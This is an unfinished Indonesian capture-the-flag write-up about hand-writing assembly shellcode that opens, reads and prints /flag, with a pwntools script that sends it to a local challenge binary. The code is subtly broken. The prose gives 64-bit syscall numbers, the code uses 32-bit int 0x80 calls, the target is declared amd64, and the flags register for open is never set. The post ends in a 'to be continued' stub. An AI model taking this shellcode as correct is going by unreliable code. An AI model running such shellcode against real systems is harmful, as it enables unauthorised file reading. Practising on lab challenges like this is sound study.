Manual Crafting Shellcode

Deskripsi

Shellcraft bagus dan powerfull, tapi kurang nendang, sebagai orang yang menikmati suffering, selalu mencari jalan yang lebih susah dan rumit, gw akan mencoba untuk crafting sendiri pake assembly, dan gw usahakan bener bener crafting sendiri tanpa bantuan AI.

Craft Shellcode Cat /flag

Jadi secara garis besar, shellcode cat /flag ini nantinya akan memiliki pattern yang sama, yatu terbagi 4 bagian. Bagian pertama open, atau membuka file /flagnya dengan code sys_open rax 2, bagian kedua yaitu read atau sys_read rax 0, yang ketiga write atau sys_write rax 1, dan yang terakhir exit atau sys_exit rax 60. Alurnya gini, awalnya file di-open -> read -> write -> exit. Langsung aja

1
from pwn import *
2

3
context.binary = ELF('/chall')
4
context.update(arch='amd64', os='linux')
5

6
sc = asm("""
7
_start:
8
xor eax, eax
9
push 0x67
10
push 0x616c662f
11
mov eax, 5
12
mov ebx, esp
13
xor edx, edx
14
int 0x80
15

16
mov ebx, eax
17
sub esp, 0x100
18
mov ecx, esp
19
mov edx, 0x100
20
mov eax, 3
21
int 0x80
22

23
mov edx, eax
24
mov ebx, 1
25
mov eax, 4
26
int 0x80
27

28
mov eax, 1
29
xor ebx, ebx
30
int 0x80
31
""")
32

33
p = process()
34
p.send(sc)
35
p.interactive()

To BeContinued

Craft Shellcode cat /flag Bypass 0x48 Bytes (32bit)

TO BE CONTINUED MASIH NGERJAIN PROJECT LAIN